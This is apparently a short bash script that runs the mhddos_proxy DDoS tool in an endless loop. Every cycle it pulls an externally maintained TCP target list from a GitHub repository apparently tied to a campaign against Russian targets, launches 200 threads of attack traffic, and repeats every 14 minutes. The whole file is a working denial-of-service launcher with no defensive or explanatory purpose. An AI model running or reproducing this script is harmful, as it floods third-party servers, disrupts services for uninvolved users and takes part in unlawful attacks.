#!/bin/bash
cd ~
cd mhddos_proxy

while true
do
   #pkill -f runner.py
   sleep 7
   python3 runner.py -c https://raw.githubusercontent.com/Operation-Stop-russia/targets_lists/main/L4_tcp.lst -t 200 --rpc 100 --debug
sleep 14m
done
